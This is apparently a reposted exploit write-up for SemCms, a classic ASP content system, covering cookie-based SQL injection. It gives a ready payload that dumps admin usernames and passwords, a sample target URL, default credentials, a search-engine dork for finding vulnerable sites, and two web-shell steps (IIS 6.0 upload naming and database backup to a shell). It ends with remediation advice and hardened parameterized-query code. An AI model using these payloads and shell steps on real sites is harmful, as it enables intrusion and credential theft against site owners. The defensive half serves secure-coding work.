By Mr. DzY from www.0855.tv
Someone had already found the admin-panel cookie spoofing vulnerability, but the official site appears to have fixed that one.
Nothing to worry about there. After reading the source, we found that data submitted through cookies is not filtered at all, so cookie injection works.
SemCms is an open source website management system for foreign-trade companies, compatible with the mainstream browsers (IE, Firefox, Chrome, Safari and Opera). SemCms is written in VBScript (classic ASP) and runs on IIS.
Default admin path: clkj_admin/
Default account/password: 1 (many sites never change it!)
Vulnerable code:
Only data submitted via GET and POST is filtered; data submitted via cookies is not filtered at all, so it can be injected through the cookie.
EXP:
javascript:alert(document.cookie="pid="+escape("332 and 1=2 union select ,5,clkj_admin,clkj_password,16,17 from clkj_admin"));
Test:
www.2cto.com/new/en/P_view.asp?Pid=1,322
Possible exploitation methods:
1. The image upload lets you choose a custom file name; enter a name such as Mr.DzY.asp;1 (only works when the server runs IIS 6.0).
2. In the admin panel, on the right-hand menu, choose Inquiry Management > Data Backup > Password (the admin password) > Shell Backup.
Keywords:
inurl:P_view.asp?Pid=
Solution: filter data submitted in cookies as well, and read parameters from the specific Request collection you mean (e.g. Request.QueryString) rather than the bare Request object, which falls back to the Cookies collection when the name is absent from the query string and form.
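The following is an added illustration, not SemCms code: the fallback read pattern that makes the cookie injection possible, next to a hardened version of the same lookup in classic ASP. The table name P_content, the pid column and an already opened ADODB.Connection named conn are assumptions.

```vbscript
<%
' Added example (not SemCms code). Assumed: table P_content, column pid,
' and conn = an open ADODB.Connection.

' VULNERABLE pattern: the bare Request("pid") searches QueryString, Form,
' Cookies, ClientCertificate and ServerVariables in that order. A request
' with no ?pid= in the URL but a "pid" cookie therefore gets the cookie
' value concatenated straight into the SQL text. Shown only for contrast;
' the string is never executed here.
Dim pid, sqlVulnerable
pid = Request("pid")
sqlVulnerable = "SELECT * FROM P_content WHERE pid=" & pid

' HARDENED pattern: read only the collection you intend, validate the type,
' and bind the value as a parameter instead of building the SQL string.
Dim raw, pidNum, cmd, rs
raw = Request.QueryString("pid")              ' cookies are never consulted
If Len(raw) = 0 Or Not IsNumeric(raw) Or InStr(raw, ".") > 0 Then
    Response.Status = "400 Bad Request"       ' reject "332 and 1=2 ..." outright
    Response.End
End If
pidNum = CLng(raw)                            ' now guaranteed to be an integer

Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandText = "SELECT * FROM P_content WHERE pid = ?"
cmd.CommandType = 1                           ' adCmdText
' CreateParameter(Name, Type, Direction, Size, Value): 3 = adInteger, 1 = adParamInput
cmd.Parameters.Append cmd.CreateParameter("pid", 3, 1, , pidNum)
Set rs = cmd.Execute
%>
```

The same rule applies to every other parameter the pages read: any place that uses Request("name") instead of Request.QueryString("name") or Request.Form("name") can be reached through a cookie, whatever filtering was applied to GET and POST.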